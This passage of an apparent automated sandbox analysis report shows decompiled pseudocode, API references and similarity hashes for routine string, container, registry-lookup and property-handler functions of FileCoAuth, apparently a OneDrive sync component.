    0x00e9decd
    0x00e9ded4
    0x00e9ded9
    0x00e9dede
    0x00e9dee4
    0x00e9deea
    0x00e9deef
    0x00e9def2
    0x00e9df02
    0x00e9df09
    0x00e9df18
    0x00e9df23
    0x00e9df25
    0x00e9df28
    0x00e9df30
    0x00e9df31
    0x00e9df33
    0x00e9df3f
    0x00e9df48
    0x00e9df4b
    0x00e9df4c
    0x00e9df35
    0x00e9df38
    0x00e9df38
    0x00e9df33
    0x00e9df51
    0x00e9df5b
    0x00e9df60
    0x00e9df6b
    0x00e9df70
    0x00e9df7b
    0x00e9df7b
    0x00000000
    0x00e9dd28
    0x00e9dd04
    0x00e9dd06
    0x00000000
    0x00000000
    0x00e9dd08
    0x00e9dd1a
    0x00e9df86
    0x00e9df86
    0x00e9df91
    0x00e9df96
    0x00e9df96
    0x00000000
    0x00e9df96
    0x00e9dcea
    0x00e9dcf0
    0x00000000
    0x00000000
    0x00e9dcf2
    0x00000000
    0x00e9dcf2
    0x00e9dcdd
    0x00000000
    0x00e9df99

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9DBEE
      • Part of subcall function 00E99650: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00E9946E,00000000,?,?,?), ref: 00E99664
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_Xout_of_range@std@@
    • String ID: Personal${018D5C66-4533-4307-9B53-224DE2ED1FE6}
    • API String ID: 1689176233-2726138255
    • Opcode ID: 232c90f9cad63ec7b2ac7122f2ce8732ef5b2afe7b176d539b4dbe89f05e97eb
    • Instruction ID: 3542d6fd9da6179641aa0ff4d31f1dba4dfcb54cbc9e90a7534fe918387465c0
    • Opcode Fuzzy Hash: 232c90f9cad63ec7b2ac7122f2ce8732ef5b2afe7b176d539b4dbe89f05e97eb
    • Instruction Fuzzy Hash: 09C1AD70904268EEDF20DBA4CD81FDDBBB4AF15304F1450D9E545BB182DB70AE85CB62
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93F0C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
    Download Yara Rule
    C-Code - Quality: 60%
    			E00E93F0C(char* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				short _v16;
				void* _v20;
				signed int _v24;
				char _v32;
				short _v36;
				char _v40;
				char _v48;
				char _v52;
				intOrPtr* _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v92;
				char _v96;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				char _t35;
				intOrPtr* _t40;
				intOrPtr* _t44;
				void* _t49;
				intOrPtr* _t51;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				intOrPtr* _t74;
				void* _t75;
				void* _t78;
				signed int _t79;

				_t70 = __edx;
				_t81 = (_t79 & 0xfffffff8) - 0x44;
				_t33 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t33 ^ (_t79 & 0xfffffff8) - 0x00000044;
				_t35 = _a4;
				_t57 = _a8;
				_t74 = _a12;
				_v68 = _t35;
				if(_t74 != 0) {
					_v12 = 7;
					 *_t74 = 0;
					_v32 = 0;
					_t60 =  *((intOrPtr*)(_t35 + 0x24));
					_v36 = 0;
					_v16 = 0;
					_t70 =  &_v32;
					_t77 =  *((intOrPtr*)( *( *((intOrPtr*)(_t35 + 0x24)))))(_t57,  &_v32);
					_t39 =  >=  ? _v40 :  &_v40;
					_v72 =  >=  ? _v40 :  &_v40;
					_t40 =  &_v68;
					__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t40, _t57);
					if( *((intOrPtr*)(_t40 + 0x14)) >= 8) {
						_t40 =  *_t40;
					}
					E00E93B35(_t60, _t40, _v80, _t77);
					E00E94307( &_v92, 1, 0);
					if(_t77 >= 0) {
						_t70 =  &_v48;
						_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v84 + 0x24)))) + 8))( &_v48, 1, _t57,  &_v52);
						_t77 = _t49;
						if(_t49 >= 0) {
							_t68 =  &_v68;
							_t77 = E00E941C7( &_v68, _t74);
							_t51 =  &_v96;
							__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t51, _t57);
							if( *((intOrPtr*)(_t51 + 0x14)) >= 8) {
								_t51 =  *_t51;
							}
							E00E93BF5(_t68, _t51, _t77);
							_t53 = E00E94307( &_v112, 1, 0);
							if(_t77 >= 0 &&  *_t74 == 0) {
								_push("SyncEngineFileInfoProvider::GetPropertyHandlerFromPath");
								_t70 = 0x2c;
								E00E93DB4(_t53, _t70);
								_t77 = 0x80004005;
							}
						}
					}
					E00E94307( &_v48, 1, 0);
					_t44 = _v60;
					if(_t44 != 0) {
						 *((intOrPtr*)( *_t44 + 8))(_t44);
					}
				}
				_pop(_t75);
				_pop(_t78);
				_pop(_t58);
				return E00EA29F2(_t58, _v24 ^ _t81, _t70, _t75, _t78);
			}





































    0x00e93f0c
    0x00e93f14
    0x00e93f17
    0x00e93f1e
    0x00e93f22
    0x00e93f26
    0x00e93f2b
    0x00e93f2e
    0x00e93f34
    0x00e93f42
    0x00e93f4c
    0x00e93f4e
    0x00e93f53
    0x00e93f56
    0x00e93f5a
    0x00e93f5e
    0x00e93f6d
    0x00e93f73
    0x00e93f78
    0x00e93f7c
    0x00e93f82
    0x00e93f8c
    0x00e93f8e
    0x00e93f8e
    0x00e93f97
    0x00e93fa4
    0x00e93fab
    0x00e93fbc
    0x00e93fc3
    0x00e93fc6
    0x00e93fca
    0x00e93fcd
    0x00e93fd6
    0x00e93fd8
    0x00e93fde
    0x00e93fe8
    0x00e93fea
    0x00e93fea
    0x00e93fef
    0x00e93ffc
    0x00e94003
    0x00e9400a
    0x00e94011
    0x00e94012
    0x00e94017
    0x00e94017
    0x00e94003
    0x00e93fca
    0x00e94024
    0x00e94029
    0x00e9402f
    0x00e94034
    0x00e94034
    0x00e94037
    0x00e9403d
    0x00e9403e
    0x00e9403f
    0x00e9404a

    APIs
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?), ref: 00E93F82
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?,?), ref: 00E93FDE
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E9400A
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FromInfoPrivateString@@StripU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath
    • API String ID: 969308733-2558438510
    • Opcode ID: 098339bd4d6c11a02f4f66a3265d9247ed42670b588cd4f846659a9457c7842f
    • Instruction ID: 16831cc0a30416eed9ca2c55e0971a5dadfed999c6b39df81d64cdeaaf2bf970
    • Opcode Fuzzy Hash: 098339bd4d6c11a02f4f66a3265d9247ed42670b588cd4f846659a9457c7842f
    • Instruction Fuzzy Hash: 42415CB1605301AFC714DF24C885E5BBBF8EF89714F40591DFA45AB2A1D731E905CB92
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9AF0A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E00E9AF0A(intOrPtr* __ecx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
				intOrPtr _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr* _t51;
				intOrPtr* _t69;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t86;
				char** _t87;

				_t72 = __ecx;
				_t47 =  *((intOrPtr*)(__ecx + 4));
				if(_t47 >= 0x3fffffe) {
					_t86 = _a20;
					_t47 = E00E94F21(_t86 + 0x10);
					L00EA29EC();
					 *_t87 = "map/set<T> too long";
					__imp__?_Xlength_error@std@@YAXPBD@Z(_t86);
				}
				_t84 = _a20;
				 *((intOrPtr*)(_t72 + 4)) = _t47 + 1;
				_t49 = _a12;
				 *((intOrPtr*)(_t84 + 4)) = _t49;
				_t74 =  *_t72;
				if(_t49 != _t74) {
					if(_a8 == 0) {
						 *((intOrPtr*)(_t49 + 8)) = _t84;
						_t75 =  *_t72;
						if(_t49 ==  *((intOrPtr*)(_t75 + 8))) {
							 *((intOrPtr*)(_t75 + 8)) = _t84;
						}
					} else {
						 *_t49 = _t84;
						_t81 =  *_t72;
						if(_t49 ==  *_t81) {
							 *_t81 = _t84;
						}
					}
				} else {
					 *((intOrPtr*)(_t74 + 4)) = _t84;
					 *((intOrPtr*)( *_t72)) = _t84;
					 *((intOrPtr*)( *_t72 + 8)) = _t84;
				}
				_t50 =  *((intOrPtr*)(_t84 + 4));
				_t85 = _t84;
				while( *((char*)(_t50 + 0xc)) == 0) {
					_t51 =  *((intOrPtr*)(_t85 + 4));
					_t83 =  *((intOrPtr*)(_t51 + 4));
					_t76 =  *_t83;
					if(_t51 != _t76) {
						if( *((char*)(_t76 + 0xc)) != 0) {
							if(_t85 ==  *_t51) {
								_t85 = _t51;
								E00E95088(_t72, _t85);
							}
							 *((char*)( *((intOrPtr*)(_t85 + 4)) + 0xc)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
							E00E95042(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)));
							L20:
							_t50 =  *((intOrPtr*)(_t85 + 4));
							continue;
						}
						L16:
						 *((char*)(_t51 + 0xc)) = 1;
						 *((char*)(_t76 + 0xc)) = 1;
						 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4));
						goto L20;
					}
					_t76 =  *((intOrPtr*)(_t83 + 8));
					if( *((char*)(_t76 + 0xc)) == 0) {
						goto L16;
					}
					if(_t85 ==  *((intOrPtr*)(_t51 + 8))) {
						_t85 = _t51;
						E00E95042(_t72, _t85);
					}
					 *((char*)( *((intOrPtr*)(_t85 + 4)) + 0xc)) = 1;
					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
					E00E95088(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)));
					goto L20;
				}
				 *((char*)( *((intOrPtr*)( *_t72 + 4)) + 0xc)) = 1;
				_t69 = _a4;
				 *_t69 = _t84;
				return _t69;
			}


















    0x00e9af10
    0x00e9af14
    0x00e9af1c
    0x00e9af1e
    0x00e9af24
    0x00e9af2a
    0x00e9af2f
    0x00e9af36
    0x00e9af36
    0x00e9af3c
    0x00e9af40
    0x00e9af43
    0x00e9af46
    0x00e9af49
    0x00e9af4d
    0x00e9af61
    0x00e9af6f
    0x00e9af72
    0x00e9af77
    0x00e9af79
    0x00e9af79
    0x00e9af63
    0x00e9af63
    0x00e9af65
    0x00e9af69
    0x00e9af6b
    0x00e9af6b
    0x00e9af69
    0x00e9af4f
    0x00e9af4f
    0x00e9af54
    0x00e9af58
    0x00e9af58
    0x00e9af7c
    0x00e9af7f
    0x00e9b019
    0x00e9af86
    0x00e9af89
    0x00e9af8c
    0x00e9af90
    0x00e9afce
    0x00e9afec
    0x00e9afee
    0x00e9aff3
    0x00e9aff3
    0x00e9affd
    0x00e9b007
    0x00e9b011
    0x00e9b016
    0x00e9b016
    0x00000000
    0x00e9b016
    0x00e9afd0
    0x00e9afd0
    0x00e9afd4
    0x00e9afde
    0x00e9afe5
    0x00000000
    0x00e9afe5
    0x00e9af92
    0x00e9af99
    0x00000000
    0x00000000
    0x00e9af9e
    0x00e9afa0
    0x00e9afa5
    0x00e9afa5
    0x00e9afaf
    0x00e9afb9
    0x00e9afc3
    0x00000000
    0x00e9afc3
    0x00e9b028
    0x00e9b02c
    0x00e9b02f
    0x00e9b035

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9AF2A
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(?), ref: 00E9AF36
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@Xlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2313657577-1285458680
    • Opcode ID: 1fbcdded918270fdf0a2706d65a80e80e16406577dc64a454b8f35bcc3b6078d
    • Instruction ID: d7576bfa74b9199cea47d1d6d6d733e2751069a53c2a90d8c2b1d0559f1a1284
    • Opcode Fuzzy Hash: 1fbcdded918270fdf0a2706d65a80e80e16406577dc64a454b8f35bcc3b6078d
    • Instruction Fuzzy Hash: FD411771200640CFCB11DF19C188A65BBE1EF5A328F19D4A9E859AF362C776EC46CF91
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA21C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E00EA21C0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t69;
				intOrPtr* _t77;
				intOrPtr* _t81;
				short _t84;
				void* _t85;
				void* _t87;

				_push(0x50);
				E00EA3194(E00EA5653, __ebx, __edi, __esi);
				_t69 =  *(_t85 + 0x14);
				_t81 =  *((intOrPtr*)(_t85 + 0xc));
				 *(_t85 - 0x5c) = _t69;
				E00E94E9D(_t85 - 0x58, L"Software\\Classes\\CLSID\\");
				 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
				E00E95904(_t85 - 0x58,  *((intOrPtr*)(_t85 + 8)), 0, 0xffffffff);
				 *((intOrPtr*)(_t85 - 0x18)) = 0;
				_t84 = 0;
				 *((intOrPtr*)(_t85 - 0x14)) = 0;
				 *_t69 = 0;
				 *((intOrPtr*)(_t85 - 0x14)) = 7;
				 *((intOrPtr*)(_t85 - 0x18)) = 0;
				 *((short*)(_t85 - 0x28)) = 0;
				 *(_t85 - 4) = 1;
				E00E94E9D(_t85 - 0x40, 0xea7340);
				 *(_t85 - 4) = 2;
				_t87 = E00E9F290(0x80000001, _t85 - 0x58, _t85 - 0x40,  *((intOrPtr*)(_t85 + 0x10)), _t85 - 0x28);
				_t70 = _t69 & 0xffffff00 | _t87 > 0x00000000;
				 *(_t85 - 4) = 1;
				E00E94307(_t85 - 0x40, 1, 0);
				if((_t69 & 0xffffff00 | _t87 > 0x00000000) != 0) {
					if( *((intOrPtr*)(_t81 + 0x14)) < 8) {
						_t77 = _t81;
					} else {
						_t77 =  *_t81;
					}
					_t60 =  >=  ?  *((void*)(_t85 - 0x28)) : _t85 - 0x28;
					__imp__CompareStringOrdinal(_t60, 0xffffffff, _t77, 0xffffffff, 1);
					if((_t60 & 0xffffff00 | _t60 != 0x00000002) != 0) {
						 *( *(_t85 - 0x5c)) = 1;
						E00E94E9D(_t85 - 0x40, 0xea7340);
						 *(_t85 - 4) = 3;
						_t84 = E00E9F5DC(0x80000001, _t85 - 0x58, _t85 - 0x40, _t81,  *((intOrPtr*)(_t85 + 0x10)), 0);
						 *(_t85 - 4) = 1;
						E00E94307(_t85 - 0x40, 1, 0);
					}
				}
				 *(_t85 - 4) = 0;
				E00E94307(_t85 - 0x28, 1, 0);
				 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
				E00E94307(_t85 - 0x58, 1, 0);
				return E00EA3152(_t70, _t81, _t84);
			}










    0x00ea21c0
    0x00ea21c7
    0x00ea21cc
    0x00ea21d5
    0x00ea21dd
    0x00ea21e0
    0x00ea21e5
    0x00ea21f1
    0x00ea21f8
    0x00ea21fb
    0x00ea21fd
    0x00ea2200
    0x00ea2202
    0x00ea2209
    0x00ea220c
    0x00ea2210
    0x00ea221c
    0x00ea2221
    0x00ea223e
    0x00ea2240
    0x00ea2243
    0x00ea224d
    0x00ea2254
    0x00ea225a
    0x00ea2260
    0x00ea225c
    0x00ea225c
    0x00ea225c
    0x00ea226b
    0x00ea2275
    0x00ea2283
    0x00ea2290
    0x00ea2293
    0x00ea2298
    0x00ea22b4
    0x00ea22b6
    0x00ea22c1
    0x00ea22c1
    0x00ea2283
    0x00ea22c6
    0x00ea22d1
    0x00ea22d6
    0x00ea22e1
    0x00ea22ed

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA21C7
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000001,00000001,00000000,00EA7340,?,00000000,000000FF,Software\Classes\CLSID\,00000050,00EA2310,?,?), ref: 00EA2275
    Strings
    • Software\Classes\CLSID\, xrefs: 00EA21D8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseCompareH_prolog3_OpenOrdinalQueryStringValueXlength_error@std@@Xout_of_range@std@@
    • String ID: Software\Classes\CLSID\
    • API String ID: 1024312143-2087380861
    • Opcode ID: 96e1f6d5bf8235d97d9488a9beb4e580aaa3569b637b484a5e11af41db7646ae
    • Instruction ID: acbbba48738831576471641150a8c36b7f0b93e496bd915ba840f50ed392e661
    • Opcode Fuzzy Hash: 96e1f6d5bf8235d97d9488a9beb4e580aaa3569b637b484a5e11af41db7646ae
    • Instruction Fuzzy Hash: 35415971905249EEDF01DBE4CC46FEDBBB4AF1A314F141158E610BB1C1D7B0AA45CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9404D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
    Download Yara Rule
    C-Code - Quality: 58%
    			E00E9404D(signed int* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v36;
				void* __ebx;
				void* __edi;
				signed int _t20;
				intOrPtr* _t24;
				signed int _t27;
				intOrPtr* _t32;
				void* _t34;
				intOrPtr _t37;
				intOrPtr _t38;
				signed int* _t47;
				void* _t49;
				signed int _t50;

				_t48 = __esi;
				_t46 = __edx;
				_t20 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t20 ^ _t50;
				_t38 = _a4;
				_t37 = _a8;
				_t47 = _a12;
				if(_t47 != 0) {
					 *_t47 =  *_t47 & 0x00000000;
					_t46 =  &_v12;
					_t39 =  *((intOrPtr*)(_t38 + 0x24));
					_v12 = _v12 & 0x00000000;
					_t49 =  *((intOrPtr*)( *( *((intOrPtr*)(_t38 + 0x24))) + 4))(2, _t37,  &_v12, __esi);
					_t24 =  &_v36;
					__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t24, _t37);
					if( *((intOrPtr*)(_t24 + 0x14)) >= 8) {
						_t24 =  *_t24;
					}
					E00E93C8A(_t39, _t24, _t49);
					E00E94307( &_v36, 1, 0);
					if(_t49 >= 0) {
						_t44 =  &_v12;
						_t49 = E00E941C7( &_v12, _t47);
						_t32 =  &_v36;
						__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t32, _t37);
						if( *((intOrPtr*)(_t32 + 0x14)) >= 8) {
							_t32 =  *_t32;
						}
						E00E93DE2(_t44, _t32, _t49);
						_t34 = E00E94307( &_v36, 1, 0);
						if(_t49 >= 0 &&  *_t47 == 0) {
							_push("SyncEngineFileInfoProvider::GetPropertyHandlerFromUri");
							_t46 = 0x4f;
							E00E93DB4(_t34, _t46);
							_t49 = 0x80004005;
						}
					}
					_t27 = _v12;
					if(_t27 != 0) {
						 *((intOrPtr*)( *_t27 + 8))(_t27);
					}
					_pop(_t48);
				}
				return E00EA29F2(_t37, _v8 ^ _t50, _t46, _t47, _t48);
			}


















    0x00e9404d
    0x00e9404d
    0x00e94055
    0x00e9405c
    0x00e9405f
    0x00e94063
    0x00e94067
    0x00e9406c
    0x00e94078
    0x00e9407b
    0x00e9407e
    0x00e94081
    0x00e9408f
    0x00e94091
    0x00e94096
    0x00e940a0
    0x00e940a2
    0x00e940a2
    0x00e940a7
    0x00e940b3
    0x00e940ba
    0x00e940bd
    0x00e940c5
    0x00e940c7
    0x00e940cc
    0x00e940d6
    0x00e940d8
    0x00e940d8
    0x00e940dd
    0x00e940e9
    0x00e940f0
    0x00e940f7
    0x00e940fe
    0x00e940ff
    0x00e94104
    0x00e94104
    0x00e940f0
    0x00e94109
    0x00e9410e
    0x00e94113
    0x00e94113
    0x00e94118
    0x00e94118
    0x00e94128

    APIs
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?), ref: 00E94096
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?,?,00000001,00000000), ref: 00E940CC
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E940F7
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FromInfoPrivateString@@StripU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri
    • API String ID: 969308733-2814660012
    • Opcode ID: 785a306c01c40e5d388b5465217b9b20d992d3229f0ed39a4da2fcb35054e805
    • Instruction ID: ddb49f885d4efaf0759983cd4e28c676182e00f2487a928ae3c3d92c38ed233a
    • Opcode Fuzzy Hash: 785a306c01c40e5d388b5465217b9b20d992d3229f0ed39a4da2fcb35054e805
    • Instruction Fuzzy Hash: 70219CB2601218AFDF10DBA5CC89FAABBB8EF59711F001159F905BB191DB31ED41CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E98198, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00E98198(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				signed int _t17;
				intOrPtr _t26;
				intOrPtr* _t27;
				signed int _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				signed int _t36;
				void* _t42;

				_t39 = _a4;
				_t42 = __ecx;
				_t17 = E00E94ABF(__ecx, _a4);
				if(_t17 == 0) {
					_t33 =  *((intOrPtr*)(__ecx + 0x10));
					_t30 = _a8;
					if((_t17 | 0xffffffff) - _t33 <= _t30) {
						__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
					}
					if(_t30 != 0) {
						_a8 = _t33 + _t30;
						if(E00E94D8F(_t30, _t42, _t39, _t33 + _t30, 0) != 0) {
							if( *((intOrPtr*)(_t42 + 0x14)) < 8) {
								_t35 = _t42;
							} else {
								_t35 =  *_t42;
							}
							E00E942E3(_t35 +  *(_t42 + 0x10) * 2, _t39, _t30);
							_t36 = _a8;
							 *(_t42 + 0x10) = _t36;
							if( *((intOrPtr*)(_t42 + 0x14)) < 8) {
								_t26 = _t42;
							} else {
								_t26 =  *_t42;
							}
							 *((short*)(_t26 + _t36 * 2)) = 0;
						}
					}
					return _t42;
				}
				if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
					_t27 = __ecx;
				} else {
					_t27 =  *__ecx;
				}
				return E00E95904(_t42, _t42, _t39 - _t27 >> 1, _a8);
			}













    0x00e9819f
    0x00e981a2
    0x00e981a5
    0x00e981ac
    0x00e981cc
    0x00e981d3
    0x00e981da
    0x00e981e1
    0x00e981e1
    0x00e981e9
    0x00e981f3
    0x00e981fd
    0x00e98203
    0x00e98209
    0x00e98205
    0x00e98205
    0x00e98205
    0x00e98214
    0x00e98219
    0x00e98223
    0x00e98226
    0x00e9822c
    0x00e98228
    0x00e98228
    0x00e98228
    0x00e98230
    0x00e98230
    0x00e981fd
    0x00000000
    0x00e98236
    0x00e981b2
    0x00e981b8
    0x00e981b4
    0x00e981b4
    0x00e981b4
    0x00000000

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@
    • String ID: Last known error: $string too long
    • API String ID: 1004598685-548090674
    • Opcode ID: 5c83be984a61b532799070fc5ea6c99b901328388afc7057510bf4c25a87739d
    • Instruction ID: 1f603c2f61501cdd1725475097cae5e36751b3d6dc3f283b0106abdc284e5b22
    • Opcode Fuzzy Hash: 5c83be984a61b532799070fc5ea6c99b901328388afc7057510bf4c25a87739d
    • Instruction Fuzzy Hash: 4011D2713016049BCF34CF6ADD449AA77E9EF83B50710152DF456AB2A0DF30A90AC790
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93157, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00E93157(void* __ecx, intOrPtr* _a4, intOrPtr _a8, void _a12) {
				void* __ebx;
				void* __edi;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t28;
				int _t30;
				void* _t31;

				_t25 = __ecx;
				_t13 = _a8;
				_t24 = _a4;
				_t31 = __ecx;
				_t28 =  *((intOrPtr*)(_t24 + 0x10));
				if(_t28 < _t13) {
					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
				}
